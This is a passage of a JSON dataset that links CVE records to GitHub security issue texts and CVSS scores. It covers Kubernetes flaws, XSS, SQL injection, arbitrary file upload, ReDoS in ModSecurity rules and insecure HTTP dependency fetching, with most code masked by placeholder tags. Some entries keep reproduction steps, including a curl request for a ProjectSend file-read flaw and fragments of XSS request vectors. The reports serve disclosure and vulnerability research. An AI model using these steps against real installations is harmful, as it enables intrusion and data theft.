        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/80983",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2019-08-05T12:44:08Z",
        "description": "WIP Placeholder Issue NUMBERTAG Please don't remove or close this issue. I will be updating it later today. /area security",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11248",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/81023",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/81023",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2019-08-06T14:34:33Z",
        "description": "CVETAG : /debug/pprof exposed on kubelet's healthz port. The debugging endpoint APITAG is exposed over the unauthenticated Kubelet healthz port. Versions prior to NUMBERTAG and NUMBERTAG are affected. The issue is of medium severity, but not exposed by the default configuration. If you are exposed we recommend upgrading to at least one of the versions listed. Am I vulnerable? By default, the Kubelet exposes unauthenticated healthz endpoints on port NUMBERTAG but only over localhost. If your nodes are using a non localhost APITAG ( health bind address), and an older version, you may be vulnerable. If your nodes are using the default localhost APITAG it is only exposed to pods or processes running in the host network namespace. Run kubectl get nodes to see whether nodes are running a vulnerable version. Run APITAG to check whether the APITAG is non local. How do I mitigate the vulnerability? Upgrade to a patched version NUMBERTAG or NUMBERTAG or, update node configurations to set the APITAG to APITAG URLTAG fixed in NUMBERTAG URLTAG fixed in NUMBERTAG URLTAG fixed in NUMBERTAG URLTAG fixed in NUMBERTAG ulnerability Details The go pprof endpoint is exposed over the Kubelet's healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Thanks to Jordan Zebor of F5 Networks for reporting this problem. /area security /close",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L",
        "severity": "HIGH",
        "baseScore": 8.2,
        "impactScore": 4.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11249",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/80984",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/80984",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2019-08-05T12:44:23Z",
        "description": "WIP Placeholder Issue NUMBERTAG Please don't remove or close this issue. I will be updating it later today. /area security",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11250",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/81114",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/81114",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2019-08-08T02:03:04Z",
        "description": "Bearer tokens are revealed in logs. This issue was reported in the FILETAG Description Kubernetes requires an authentication mechanism to enforce users\u2019 privileges. One method of authentication, bearer tokens, are opaque strings used to associate a user with their having successfully authenticated previously. Any user with possession of this token may masquerade as the original user (the \u201cbearer\u201d) without further authentication. Within Kubernetes, the bearer token is captured within the hyperkube kube apiserver system logs at high verbosity levels NUMBERTAG A malicious user with access to the system logs on such a system could masquerade as any user who has previously logged into the system. Exploit Scenario Alice logs into a Kubernetes cluster and is issued a Bearer token. The system logs her token. Eve, who has access to the logs but not the production Kubernetes cluster, replays Alice\u2019s Bearer token, and can masquerade as Alice to the cluster. Recommendation Short term, remove the Bearer token from the log. Do not log any authentication credentials within the system, including tokens, private keys, or passwords that may be used to authenticate to the production Kubernetes cluster, regardless of the logging level. Long term, either implement policies that enforce code review to ensure that sensitive data is not exposed in logs, or implement logging filters that check for sensitive data and remove it prior to outputting the log. In either case, ensure that sensitive data cannot be trivially stored in logs.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11251",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/87773",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/87773",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2020-02-03T15:12:22Z",
        "description": "CVETAG : kubectl cp symlink vulnerability. A security issue was discovered in kubectl versions NUMBERTAG and NUMBERTAG The issue is of a medium severity and upgrading of kubectl is encouraged to fix the vulnerability. Am I vulnerable? Run kubectl version client and if it returns versions NUMBERTAG and NUMBERTAG you are running a vulnerable version. How do I upgrade? Follow installation instructions here Install and Set Up kubectl Kubernetes NUMBERTAG Not all instructions will provide up to date kubectl versions at the time of this announcement. So, always confirm with kubectl version client. Vulnerability Details The details for this vulnerability are very similar to CVETAG and CVETAG . A vulnerability has been discovered in kubectl cp that allows a combination of two symlinks to copy a file outside of its destination directory. This could be used to allow an attacker to place a netfarious file using a symlink, outside of the destination tree. This issue is filed as CVETAG . Two fixes were formulated, one fix to remove symlink support going forwards and a fix with cherry picks made to ensure backwards compatibility. See URLTAG for the primary fix in NUMBERTAG which removes the support of symlinks in kubectl cp. After version NUMBERTAG symlink support with kubectl cp is removed, it is recommended instead to use a combination of exec+tar. A second fix has been made to NUMBERTAG and backported to NUMBERTAG and NUMBERTAG This changes the kubectl cp un tar symlink logic, by unpacking the symlinks after all the regular files have been unpacked. This then guarantees that a file can\u2019t be written through a symlink. See URLTAG for the fix to version NUMBERTAG The following Cherry picks were made from this fix to earlier versions of NUMBERTAG and NUMBERTAG See URLTAG for version NUMBERTAG See URLTAG for version NUMBERTAG Thank you to Erik Sj\u00f6lund ( APITAG for discovering this issue, Tim Allclair and Maciej Szulik for both fixes and the patch release managers for including the fix in their releases. /close",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.7,
        "impactScore": 3.6,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2019-11253",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/83253",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/83253",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2019-09-27T16:53:31Z",
        "description": "Kubectl YAML parsing vulnerable to APITAG Laughs\" Attack.. Introduction Posting this as an issue following report to the security list who suggested putting it here as it's already public in a Stackoverflow question here URLTAG What happened : When creating a APITAG object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of a APITAG Laughs\" attack URLTAG which is quite well known as an XML parsing issue. Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage. CODETAG What you expected to happen : Ideally it would be good for a maximum size of entity to be defined, or perhaps some limit on recursive references in YAML parsed by kubectl. One note is that the original poster on Stackoverflow indicated that the resource consumption was in APITAG but both tests I did NUMBERTAG client against NUMBERTAG Kubeadm cluster and NUMBERTAG client against NUMBERTAG kubeadm cluster) showed the CPU usage client side. How to reproduce it (as minimally and precisely as possible) : Get the manifest above and apply to a cluster as normal with APITAG . Use top or another CPU monitor to observe the quantity of CPU time used. Anything else we need to know? : Environment : Kubernetes version (use kubectl version ): test NUMBERTAG linux AMD NUMBERTAG client, Kubeadm cluster running in kind) CODETAG test NUMBERTAG APITAG AMD NUMBERTAG client, Kubeadm cluster running in APITAG Workstation) CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11254",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/89535",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/89535",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2020-03-26T18:55:26Z",
        "description": "WIP.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11255",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/85233",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/85233",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2019-11-13T20:57:31Z",
        "description": "WIP Placeholder. APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 5.2,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-11359",
        "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/138",
        "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/138",
        "Repo_new": "mkucej/i-librarian",
        "Issue_Created_At": "2019-04-17T12:19:38Z",
        "description": "XSS vulnerability in FILETAG . Summary The parameter project is not sanitized, so attackers can poison this parameter and then create a reflected XSS attack. APITAG APITAG Details The flaw exists since APITAG was assigned to a GET parameter without sanitizing APITAG then, APITAG was printed without escaping CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11362",
        "Issue_Url_old": "https://github.com/rocboss/ROCBOSS/issues/12",
        "Issue_Url_new": "https://github.com/rocboss/rocboss-old/issues/12",
        "Repo_new": "rocboss/rocboss-old",
        "Issue_Created_At": "2019-04-18T05:49:41Z",
        "description": "ROCBOSS NUMBERTAG has SQL injection via the APITAG score paramter.. Verify that sql injection requires registration and score NUMBERTAG URLTAG ERRORTAG URLTAG The $score is not filtered, and the sql statement query is directly executed. APITAG roc_user SET score APITAG score APITAG uid APITAG send http request: APITAG CODETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11371",
        "Issue_Url_old": "https://github.com/lh3/bwa/issues/239",
        "Issue_Url_new": "https://github.com/lh3/bwa/issues/239",
        "Repo_new": "lh3/bwa",
        "Issue_Created_At": "2019-04-16T17:43:42Z",
        "description": "[bwa_index] Pack FASTA... buffer overflow detected . I found a buffer overflow in [bns_fasta2bntseq] function. CODETAG The name buffer has only NUMBERTAG bytes, in order that buffer overflow occurs if we pass more than NUMBERTAG bytes as prefix.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11376",
        "Issue_Url_old": "https://github.com/inunosinsi/soycms/issues/5",
        "Issue_Url_new": "https://github.com/inunosinsi/soycms/issues/5",
        "Repo_new": "inunosinsi/soycms",
        "Issue_Created_At": "2019-04-02T07:56:02Z",
        "description": "There is one vulnerability that can APITAG arbitrary php code). There is one vulnerability that can APITAG arbitrary php code) Affected APITAG NUMBERTAG Type of APITAG arbitrary php code(can getshell) Discovered by: Ryan0lb First,we can install the cms successlly,and we can create a new website FILETAG we can insert arbitrary php code in the URLTAG FILETAG FILETAG APITAG can insert the malicious code,and getshell FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-11377",
        "Issue_Url_old": "https://github.com/vedees/wcms/issues/2",
        "Issue_Url_new": "https://github.com/vedees/wcms/issues/2",
        "Repo_new": "vedees/wcms",
        "Issue_Created_At": "2019-04-03T06:57:24Z",
        "description": "A Arbitrary File Upload Vulnerability in PATHTAG A Arbitrary File Upload Vulnerability in PATHTAG Affected software:WCMS NUMBERTAG Type of vulnerability: Arbitrary File Upload Discovered by: Ryan0lb Use this upload feature in the developer/finder\uff1a FILETAG and we can upload arbitrary file in the web server,it allows attackers upload malicious code FILETAG APITAG APITAG FILETAG code\uff1a FILETAG i hope you can fix it",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11378",
        "Issue_Url_old": "https://github.com/projectsend/projectsend/issues/700",
        "Issue_Url_new": "https://github.com/projectsend/projectsend/issues/700",
        "Repo_new": "projectsend/projectsend",
        "Issue_Created_At": "2019-04-18T03:50:31Z",
        "description": "Security Flaw read and delete arbitrary files (accessible by www data) and run arbitrary code. Type This is a: [X] Bug report Description of the problem It is possible for users to read arbitrary files and (potentially) access the supporting database, delete arbitrary files, access user passwords, run arbitrary code. Watch video for detailed information: URLTAG List the steps to reproduce the issue NUMBERTAG Upload a file (e.g. APITAG NUMBERTAG Upload the same file again but don't save it after clicking APITAG NUMBERTAG Grab the PHPSESSIONID NUMBERTAG Run the following curl command: curl ' FILETAG H APITAG keep alive' H APITAG Control: max age NUMBERTAG H APITAG FILETAG H APITAG Insecure Requests NUMBERTAG H APITAG Type: application/x www form urlencoded' H APITAG Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG H APITAG PATHTAG / ; APITAG exchange;v=b3' H APITAG FILETAG H APITAG Encoding: gzip, deflate' H APITAG Language: en APITAG H APITAG APITAG data PATHTAG compressed This will create a file called \"own3d\" that will point to FILETAG , meaning the user can now download that file (and delete it if the file is writeable by www data). Then, IF the user has access to the APITAG server hosting APITAG user can: download and crack password hashes from tbl_users; make changes to tbl_options like: allowing for upload of arbitrary file extensions (e.g. php) changing the client options, allowing clients to delete files This will allow users to later delete arbitrary files (www data has write access to) and run arbitrary php code. Environment APITAG version: r NUMBERTAG php version NUMBERTAG APITAG version NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11387",
        "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1359",
        "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1359",
        "Repo_new": "spiderlabs/owasp-modsecurity-crs",
        "Issue_Created_At": "2019-04-15T17:25:57Z",
        "description": "APITAG Vulnerability High NUMBERTAG The vulnerable regular expression is located in APITAG on line NUMBERTAG APITAG URLTAG ] The vulnerability is caused by nested repetition operators and can be exploited with the following string APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11388",
        "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1354",
        "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1354",
        "Repo_new": "spiderlabs/owasp-modsecurity-crs",
        "Issue_Created_At": "2019-04-15T16:03:37Z",
        "description": "APITAG Vulnerability High]. The vulnerable regular expression is located in APITAG on line ERRORTAG . APITAG URLTAG ] The vulnerability is caused by nested repetition operators and be exploited with the following string APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11388",
        "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1372",
        "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1372",
        "Repo_new": "spiderlabs/owasp-modsecurity-crs",
        "Issue_Created_At": "2019-04-28T08:47:31Z",
        "description": "Regarding the APITAG exploit strings & the un reproducibility. Hi there, I am submitting this issue as the team is unable to see any impact by using the \"exploit strings\" i provided. Look at the following regular expression: CODETAG This is indeed a very long regular expression to reverse into a string by hand when you are looking at tons of such regular expressions. However, the only vulnerable part of the regular expression is the following: APITAG This part will cause the regex engine to backtrack a lot because of the alternate and adjacent sub patterns and character classes matching the same characters. I focused only on finding vulnerabilities and not on writing exploits and that way, I was able to find and verify NUMBERTAG ulnerabilities under and hour. I assumed you guys would understand what I was trying to convey without making a ready to use exploit public, open to abuse. The strings I mentioned are exploits for the vulnerable parts of the regular expressions, they aren't complete attack vectors as I mentioned in my interview with Portswigger URLTAG : > The researcher added: \u201cIt should be noted that I haven\u2019t released the full exploit strings yet because the vulnerabilities still exist and can be abused. The exploits mentioned in my blog are just for the vulnerable parts of the regular expressions and won\u2019t have any effect on an implementation of APITAG I hope it makes sense now.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11389",
        "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1356",
        "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1356",
        "Repo_new": "spiderlabs/owasp-modsecurity-crs",
        "Issue_Created_At": "2019-04-15T16:13:02Z",
        "description": "APITAG Vulnerbility High NUMBERTAG The vulnerable regular expression is located in APITAG on line NUMBERTAG APITAG URLTAG ] The vulnerability is caused by nested repetition operators and intersecting alternate patterns. It can be exploited with the following string APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11390",
        "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1358",
        "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1358",
        "Repo_new": "spiderlabs/owasp-modsecurity-crs",
        "Issue_Created_At": "2019-04-15T17:01:38Z",
        "description": "APITAG Vulnerability High NUMBERTAG The vulnerable regular expression is located in APITAG on line NUMBERTAG APITAG URLTAG ] The vulnerability is caused by nested repetition operators and can be exploited with the following string ERRORTAG PS: For some reason, I was unable to reproduce it in Python engine but it works perfectly with PHP APITAG via FILETAG and gives a complexity of about NUMBERTAG n.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11391",
        "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1357",
        "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1357",
        "Repo_new": "spiderlabs/owasp-modsecurity-crs",
        "Issue_Created_At": "2019-04-15T16:22:53Z",
        "description": "APITAG Vulnerability High NUMBERTAG The vulnerable regular expression is located in APITAG on line NUMBERTAG APITAG URLTAG ] The vulnerability is caused by nested repetition operators and can be exploited with the following string APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11401",
        "Issue_Url_old": "https://github.com/siteserver/cms/issues/1858",
        "Issue_Url_new": "https://github.com/siteserver/cms/issues/1858",
        "Repo_new": "siteserver/cms",
        "Issue_Created_At": "2019-04-12T14:26:53Z",
        "description": "There is a vulnerability that the attacker can uploads a file bypassed the filtering rule to getshell.. After the administrator logged in and added a new extension of file such as \"aassp\". The administrator can upload a malicious file which extension is \"aassp\". After the file was filtered by the rule, the file extension will be changed to \" .asp\". Then the file will run as a webshell. FILETAG CODETAG The filtering rulle: APITAG The rule is so simple that replaces \"as\" . And the suggestion is: After replacied, add a judgement to enhance the filter that if \"as\" in extension of file then reject uploading.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-11404",
        "Issue_Url_old": "https://github.com/arrow-kt/arrow/issues/1310",
        "Issue_Url_new": "https://github.com/arrow-kt/arrow/issues/1310",
        "Repo_new": "arrow-kt/arrow",
        "Issue_Created_At": "2019-02-19T13:37:39Z",
        "description": "FILETAG The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical POC code exists already to maliciously compromise a JAR file inflight. See: URLTAG URLTAG MITM Attacks Increasingly Common See: URLTAG URLTAG Source Locations URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-11404",
        "Issue_Url_old": "https://github.com/arrow-kt/ank/issues/35",
        "Issue_Url_new": "https://github.com/arrow-kt/ank/issues/35",
        "Repo_new": "arrow-kt/ank",
        "Issue_Created_At": "2019-02-19T21:46:56Z",
        "description": "FILETAG FILETAG The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical POC code has existed since NUMBERTAG to maliciously compromise a JAR file inflight. See: URLTAG URLTAG MITM Attacks Increasingly Common See: URLTAG URLTAG Source Locations URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-11405",
        "Issue_Url_old": "https://github.com/OpenAPITools/openapi-generator/issues/2253",
        "Issue_Url_new": "https://github.com/openapitools/openapi-generator/issues/2253",
        "Repo_new": "openapitools/openapi-generator",
        "Issue_Created_At": "2019-02-27T14:13:28Z",
        "description": "FILETAG FILETAG This project is generating starter projects that are resolving dependencies over HTTP instead of HTTPS. Additionally, the sample associated with this project are vulnerable to this as well. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical POC code has existed since NUMBERTAG to maliciously compromise a JAR file inflight. See: URLTAG URLTAG MITM Attacks Increasingly Common See: URLTAG URLTAG Comcast continues to inject its own code into websites you visit URLTAG (over HTTP) Source Locations URLTAG URLTAG URLTAG There are definately more locations that I've listed here. I know that MENTIONTAG has caught many of them here NUMBERTAG I just ask that the team take an extra sweep to check for this anywhere else and be aware of it in future PR's. Public Disclosure This issue requires public disclosure as it impacts users that have used this project to generate their starter projects. A project maintainer needs to file for a CVE number to inform the public about this vulnerability. If a maintainer on this project works for or is associated with a CNA, please have them file it with them: FILETAG Otherwise, an open source CVE should be filed for here: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.4,
        "impactScore": 5.2,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-11406",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/821",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/821",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2019-04-21T17:35:42Z",
        "description": "Subrion CMS NUMBERTAG allows PATHTAG XSS via the name, email, or phone parameter. > APITAG Information] > Exploit Title: APITAG CMS NUMBERTAG SS] > Date NUMBERTAG Exploit Author: APITAG Alorf twitter: APITAG > Vendor Homepage: [ URLTAG > Software Link: [ URLTAG > Version NUMBERTAG Tested on: APITAG > > Vulnerable paramters: > > parameter: name. > parameter: email. > parameter: phone. > > > APITAG > > > POST PATHTAG HTTP NUMBERTAG Host: APITAG > Cookie: APITAG APITAG > Upgrade Insecure Requests NUMBERTAG APITAG > APITAG &phone=&subject='\" > APITAG &msg=&security_code= > > > > APITAG Type] > Cross Site Scripting (XSS) > > > > APITAG of Product] > FILETAG > > > > APITAG Product Code Base] > Subrion CMS NUMBERTAG APITAG Component] > parameter: name. > parameter: email. > parameter: phone. > In contact page > > > > APITAG Type Other] > XSS > > > > APITAG Code execution] > true > > > > APITAG Vectors] > POST PATHTAG HTTP NUMBERTAG Host: APITAG > Cookie: APITAG APITAG > > APITAG > APITAG &phone=&subject='\" > APITAG &msg=&security_code= > > > > APITAG > URLTAG Use CVETAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11426",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/64",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/64",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2019-04-18T01:38:46Z",
        "description": "ICMS NUMBERTAG Reflect Cross Site Scripting Vulnerabilities. First one APITAG Second one APITAG View details FILETAG sysorem.li APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11428",
        "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/139",
        "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/139",
        "Repo_new": "mkucej/i-librarian",
        "Issue_Created_At": "2019-04-18T09:45:37Z",
        "description": "XSS vulnerability in FILETAG . Summary The parameter export_files is not sanitized, so attackers can poison this parameter and then create a reflected XSS attack. POC URLTAG \"> APITAG alert NUMBERTAG APITAG Detail APITAG then, $get_pos_export_files was printed without escaping APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11449",
        "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/140",
        "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/140",
        "Repo_new": "mkucej/i-librarian",
        "Issue_Created_At": "2019-04-18T15:18:33Z",
        "description": "Stored XSS in FILETAG . Summary The parameter APITAG is not sanitized after querying from database, so attackers can create a stored XSS attack. How to reproduce NUMBERTAG APITAG NUMBERTAG in your browser, access APITAG while logged in Detail The bug exists since APITAG was assigned to result of database query without sanitizing URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11463",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/1165",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/1165",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2019-03-28T17:41:33Z",
        "description": "Memory leak when decoding LZMA. I've encountered a memory leak while fuzzing libarchive. A NUMBERTAG byte reproducer input is attached: FILETAG . Do not extract this zip file it is the fuzzed input itself. To reproduce, build latest libarchive with ASAN ( APITAG ) and run: ERRORTAG Without ASAN, this can also be reproduced using Valgrind: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-11471",
        "Issue_Url_old": "https://github.com/strukturag/libheif/issues/123",
        "Issue_Url_new": "https://github.com/strukturag/libheif/issues/123",
        "Repo_new": "strukturag/libheif",
        "Issue_Created_At": "2019-04-14T12:30:34Z",
        "description": "APITAG heap use after free at APITAG As of dcbfa NUMBERTAG APITAG may report a heap use after free error when libheif is compiled with APITAG ERRORTAG zipped POCs: FILETAG",
